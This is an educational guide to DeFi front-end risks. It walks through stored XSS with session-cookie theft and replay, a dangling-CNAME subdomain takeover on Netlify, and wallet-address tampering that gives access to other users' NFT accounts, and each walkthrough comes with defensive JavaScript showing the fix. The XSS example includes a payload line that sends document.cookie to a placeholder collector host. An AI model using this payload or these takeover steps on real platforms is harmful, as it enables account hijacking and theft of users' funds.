# Risks in DeFi

## Front-end Malicious Script

A front-end vulnerability is a security flaw in the user interface or client-side code of a DeFi application that lets an attacker steal or manipulate users' funds or sensitive information. It covers malicious script injection, cross-site scripting (XSS), clickjacking and similar issues. A malicious script injected this way runs in the victim's browser with the page's privileges, so it can read the user's DASH coin account balance, keystore or private key, seed phrase and other critical information and upload it to an attacker-controlled address.

### For example:

A certain trading platform's backend has an XSS vulnerability in the personal profile name field: the saved name is rendered back into the page without escaping, so malicious scripts can be injected and execute in the browser of anyone who views the profile.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FVYH6RQ23AsKbcK27dH0Z%2F1.png?alt=media&#x26;token=2f623a4f-a376-49d2-b54f-e033195f0c62" alt=""><figcaption></figcaption></figure>

Step 1 : Intercept the profile-update request and append a malicious script after the name `kite`.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FCjZTMdsOdcWQgG3PouRL%2F2.png?alt=media&#x26;token=bd0215c5-1ac0-47f0-964b-097e13e72678" alt=""><figcaption></figcaption></figure>

Step 2 : Forward the request and check the page: the injected script executes and returns the cookie of the currently logged-in user.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F2ootalKViq9dSyQOk9nT%2F3.png?alt=media&#x26;token=428c5fb1-a4d7-4866-9e8b-494869bc9d56" alt=""><figcaption></figcaption></figure>

Step 3 : Replace the payload with the XSS platform's collector script (a hosted endpoint that records whatever the script sends it) and wait for the callback. When any user visits this page, the XSS platform receives that victim's login credentials.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FjEomSUYs5zNMvzmGy2Rs%2F4.png?alt=media&#x26;token=4e913fba-18ff-4806-8fe7-4209c54013f2" alt=""><figcaption></figcaption></figure>

Step 4 : Copy the captured cookie, set it via `document.cookie` in the browser's developer console, and reload: the session is now logged in as the victim. This works because the session cookie was readable from script, which means it was issued without the `HttpOnly` flag.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2Fxy9BudVZQYKyoyh4pUNS%2F5.png?alt=media&#x26;token=a84fee9c-4443-46f4-ac1f-11c7c3d590cd" alt=""><figcaption></figcaption></figure>
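As an added example (not code from the original page or the affected platform), the JavaScript below models the two weaknesses this walkthrough chains together: the profile name interpolated straight into HTML, and a session cookie that page script can read. Each sits beside its fix. The collector hostname, field names and markup are assumptions.

```javascript
// Added example, not code from the page or the affected platform. Node.js, no dependencies.
// Assumptions (not from the page): the backend renders the display name into HTML by string
// interpolation, and the session cookie is issued without the HttpOnly flag.

// A payload in the spirit of the walkthrough: the legitimate name "kite" followed by a script
// that ships document.cookie to a collector. collector.example is a placeholder hostname.
const PAYLOAD =
  'kite<script>new Image().src="https://collector.example/?c="+' +
  'encodeURIComponent(document.cookie)</script>';

// Vulnerable: whatever the user saved as their name becomes part of the page's markup.
function renderProfileVulnerable(name) {
  return `<h2 class="profile-name">${name}</h2>`;
}

// Fix 1: escape the five characters that change meaning in HTML text and attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderProfileSafe(name) {
  return `<h2 class="profile-name">${escapeHtml(name)}</h2>`;
}

// Crude detector used to compare the two renderings: does the output contain a script element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Fix 2 (defence in depth): parse a Set-Cookie header and report whether page script could
// read the cookie. Step 4 of the walkthrough only works because document.cookie exposed the
// session cookie, i.e. it lacked HttpOnly.
function cookieReadableByScript(setCookieHeader) {
  const attrs = setCookieHeader.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return !attrs.includes('httponly');
}

// How the session cookie should be issued: HttpOnly stops document.cookie from reading it,
// Secure keeps it off plaintext HTTP, SameSite=Lax blunts cross-site request forgery.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Side-by-side demonstration.
console.log('vulnerable:', renderProfileVulnerable(PAYLOAD));
console.log('safe:      ', renderProfileSafe(PAYLOAD));
console.log('cookie readable by script:',
  cookieReadableByScript(sessionCookieHeader('sid', 'abc123')));
```

Escaping on output closes the injection; `HttpOnly` means that even a script that does execute cannot replay the session the way Step 4 does. A Content-Security-Policy that forbids inline script adds a third layer, but the two above are the minimum.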

## Domain Hijacking

A DeFi front end's domain can be hijacked without touching the registrar when one of its DNS records points at a third-party hosting name that nobody controls any more (a dangling CNAME). Whoever registers that name on the hosting provider then serves their own content under the project's domain.

### For example:

Step 1 : Access the URL [https://xx.com/](https://dashboard.galxe.com/).

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FBogyCjn51UsEgRxPZUz7%2Fyumingjiechi1.png?alt=media&#x26;token=292216a6-6529-46bd-ae29-fedeb5e2a459" alt=""><figcaption></figcaption></figure>

Step 2 : Check the DNS records of xx.com: its CNAME points to dashboard-xx.netlify.app, a Netlify site name that is not currently claimed by anyone.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2Fe9xDHLpAbZTEreKAxo09%2Fyuming2.png?alt=media&#x26;token=e4b1a716-ee5f-488d-99a0-0f8dc467efaa" alt=""><figcaption></figcaption></figure>

Step 3 : Create and deploy a Next.js application from a template on <https://www.netlify.com>.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FNjxe9MNdh1A4NpKWtCOu%2Fyuming3.png?alt=media&#x26;token=a3741617-ac10-4056-a354-8005031098dc" alt=""><figcaption></figcaption></figure>

Step 4 : Under the Domain Management tab, add an additional custom domain.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FuqDQKyrYRkd8ia2IBkQU%2Fyuming4.png?alt=media&#x26;token=5a21e0f2-7ac7-4bbd-b986-02fd5182a62c" alt=""><figcaption></figcaption></figure>

Step 5 : Enter xx.com in the custom domain field. This added domain becomes the site's "main domain", and the Netlify domain becomes the "default subdomain".

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FBXZJe3Yw7H1AZJbvM1it%2Fyuming5.png?alt=media&#x26;token=fb9c1f68-2900-4c3d-ac5e-3b6b0500e6b6" alt=""><figcaption></figcaption></figure>

Step 6 : Visit <https://xx.com>: the page now shows the Next.js template deployed earlier.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FxhgWnnucmDEclgCq5qfj%2Fyuming6.png?alt=media&#x26;token=ad84fada-f2f4-48f7-ad8f-025e2b3d0df3" alt=""><figcaption></figcaption></figure>

At this point the domain has been hijacked. The attacker can serve a page under the trusted domain that asks users to enter their mnemonic phrase or private key, and so steal their personal information and wallet assets. The root cause is the stale DNS record: remove CNAMEs whose targets are no longer deployed, or keep the target claimed for as long as the record exists.
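As an added example (not code from the original page or from Netlify), the JavaScript below audits a table of DNS records for the condition exploited above: a CNAME chain that ends at a name on a takeover-prone hosting provider and no longer resolves. The record table, the provider suffix list and the 192.0.2.x addresses are constructed for this example; in practice the table would be filled from `dig` or Node's `dns.promises.resolveCname`/`resolve4` output.

```javascript
// Added example, not code from the page or from any hosting provider. Node.js, no dependencies.
// `records` maps a hostname to { cname } or { a: [...] }. Hosts with no entry have no records.

// Non-exhaustive list (assumption) of provider suffixes where an unclaimed name can be
// registered by anyone with an account.
const TAKEOVER_PRONE_SUFFIXES = [
  '.netlify.app', '.herokuapp.com', '.github.io', '.azurewebsites.net', '.s3.amazonaws.com',
];

function isTakeoverProne(host) {
  const h = host.toLowerCase();
  return TAKEOVER_PRONE_SUFFIXES.some((s) => h.endsWith(s));
}

// Follow the CNAME chain from `host` and classify the terminal name.
function auditCname(host, records) {
  const chain = [host];
  const seen = new Set([host]);
  let current = host;
  for (;;) {
    const rec = records[current];
    if (rec && rec.cname) {
      const target = rec.cname.replace(/\.$/, ''); // strip zone-file trailing dot
      if (seen.has(target)) return { chain, terminal: current, status: 'loop', dangling: false };
      chain.push(target);
      seen.add(target);
      current = target;
      continue;
    }
    const resolves = Boolean(rec && rec.a && rec.a.length);
    const thirdParty = isTakeoverProne(current);
    return {
      chain,
      terminal: current,
      status: resolves ? 'resolves' : 'unresolved',
      thirdParty,
      // Dangling: the name we ultimately depend on has no address records and lives on a
      // provider where anyone can claim it, which is exactly Step 2 of the walkthrough.
      dangling: !resolves && thirdParty,
    };
  }
}

function findDangling(records) {
  return Object.keys(records).filter((h) => auditCname(h, records).dangling);
}

// Constructed sample DNS data. xx.com and dashboard-xx.netlify.app mirror the walkthrough;
// dashboard-xx.netlify.app has no entry because the Netlify site behind it was deleted.
const SAMPLE_RECORDS = {
  'xx.com': { cname: 'dashboard-xx.netlify.app.' },
  'docs.example.net': { cname: 'example-docs.github.io.' },
  'example-docs.github.io': { a: ['192.0.2.20'] },   // still claimed and serving
  'www.example.net': { cname: 'example.net.' },
  'example.net': { a: ['192.0.2.10'] },
  'a.example.org': { cname: 'b.example.org' },       // misconfigured loop, not a takeover
  'b.example.org': { cname: 'a.example.org' },
};

for (const host of Object.keys(SAMPLE_RECORDS)) {
  const r = auditCname(host, SAMPLE_RECORDS);
  console.log(`${host}: ${r.chain.join(' -> ')} [${r.status}]${r.dangling ? ' DANGLING' : ''}`);
}
```

Run this against every hostname in the zone on a schedule; a `dangling` result is the window in which Steps 3 to 5 above succeed. A CNAME that resolves to a third-party host is not itself a finding, only one whose target has gone away.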

## Off-chain data source tampering

Much of a DeFi front end's state (profiles, NFT inventories, listings) is served by an off-chain backend rather than read from the chain. If that backend identifies the user by a value the client supplies, such as a wallet address in the request body, instead of by the authenticated session, any user can act as any other user simply by editing the request.

### For example:

Before the attack, the logged-in user opens My NFT; the account holds no NFT assets.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FYuJW4mSGyij615jRcSAS%2Fcuangai1.png?alt=media&#x26;token=10a9c947-2543-4c61-a868-cc2892c68eac" alt=""><figcaption></figcaption></figure>

Step 1 : Obtain another user's address from the listings in the NFT market; the address taken from the link is 0xfB67dc...

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F424XDIcRjZlN5sglFqpx%2Fcg2.png?alt=media&#x26;token=cfddb74a-d955-45d9-806e-3538ef3d6868" alt=""><figcaption></figcaption></figure>

Step 2 : Go back to the My NFT page, click Sale and capture the request.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FgcJChznPBfDhblUq6vmK%2Fcg3.png?alt=media&#x26;token=6f974fea-cd1d-40fe-93df-d39e3bca8b90" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FVvq1stJORTTjCt7JBdBU%2Fcg4.png?alt=media&#x26;token=eea9a6ee-c099-4b7f-bfa5-a84127cc0531" alt=""><figcaption></figcaption></figure>

Step 3 : Replace the `useraddress` parameter with 0xfB67dc31....

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FFT1P6yqhWRGEGtNcscqJ%2Fcg5.png?alt=media&#x26;token=c6ebd17a-bc0b-4446-9620-2bf3b5ab74cf" alt=""><figcaption></figcaption></figure>

Step 4 : Modify the request body accordingly before forwarding it.

Step 5 : Click Collection to fetch the data; the page now shows the NFT management backend of user 0xfB67dc31..

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F95Xaifr3LWgr9OS98qVY%2Fcg6.png?alt=media&#x26;token=12e8abbc-5e95-457d-ae1c-772f93dc36d7" alt=""><figcaption></figcaption></figure>

Because the backend trusts the address in the request instead of the address bound to the authenticated session, changing that one field gives horizontal privilege escalation into any other account: the attacker can mint ("cast") or list for sale other users' assets at will. The fix is to derive the acting address server-side from the session and to verify ownership of the asset against that address before any mint or sale, ignoring or rejecting a client-supplied address that does not match.
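As an added example (not code from the original page or the affected marketplace), the JavaScript below models the backend endpoints abused above, once trusting the `userAddress` field from the request body and once taking the identity from the authenticated session, then replays the walkthrough against both. The addresses, token data, field names and the `ownerOf` table are constructed for this example; the victim address stands in for the truncated 0xfB67dc... and is not the real one.

```javascript
// Added example, not code from the page or the affected marketplace. Node.js, no dependencies.
// Constructed data: two accounts and a tiny inventory. In a real deployment ownerOf would query
// the NFT contract; here it is a table lookup.
const ATTACKER = '0xa11ce00000000000000000000000000000000001';
const VICTIM = '0xfb67dc0000000000000000000000000000000002'; // placeholder, not the real address

const INVENTORY = {
  [VICTIM]: [{ tokenId: 101, name: 'Rare Kite' }, { tokenId: 102, name: 'Common Kite' }],
  [ATTACKER]: [],
};

function ownerOf(tokenId) {
  for (const [owner, items] of Object.entries(INVENTORY)) {
    if (items.some((i) => i.tokenId === tokenId)) return owner;
  }
  return null;
}

// The session is what authentication established, e.g. the address that signed the login
// challenge. It is the only identity the server may trust.
function makeSession(address) {
  return { address: address.toLowerCase() };
}

// --- Vulnerable handlers: identity comes from the request body, the session is ignored ---
function myNftVulnerable(session, body) {
  const addr = String(body.userAddress).toLowerCase();
  return { status: 200, items: INVENTORY[addr] || [] };
}

function listForSaleVulnerable(session, body) {
  const addr = String(body.userAddress).toLowerCase();
  // Looks like an ownership check, but it compares against the attacker-chosen address.
  if (ownerOf(body.tokenId) !== addr) return { status: 403, error: 'not owner' };
  return { status: 200, listing: { tokenId: body.tokenId, seller: addr, price: body.price } };
}

// --- Fixed handlers: identity comes from the session; a body address must match or is rejected ---
function myNftFixed(session, body) {
  if (body.userAddress && String(body.userAddress).toLowerCase() !== session.address) {
    return { status: 403, error: 'address does not match authenticated session' };
  }
  return { status: 200, items: INVENTORY[session.address] || [] };
}

function listForSaleFixed(session, body) {
  // Ownership is checked against the authenticated address, never a client-supplied one.
  if (ownerOf(body.tokenId) !== session.address) return { status: 403, error: 'not owner' };
  return {
    status: 200,
    listing: { tokenId: body.tokenId, seller: session.address, price: body.price },
  };
}

// Replay of the walkthrough: logged in as ATTACKER, but the request carries the victim's address.
function replayAttack() {
  const session = makeSession(ATTACKER);
  const body = { userAddress: VICTIM, tokenId: 101, price: '0.01' };
  return {
    vulnerableView: myNftVulnerable(session, body),
    vulnerableSale: listForSaleVulnerable(session, body),
    fixedView: myNftFixed(session, body),
    fixedSale: listForSaleFixed(session, body),
  };
}

console.log(JSON.stringify(replayAttack(), null, 2));
```

The same pattern applies to the mint ("cast") operation the section mentions: every state-changing action keys off `session.address`, and any address echoed from the client is at most cross-checked, never used as the subject.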
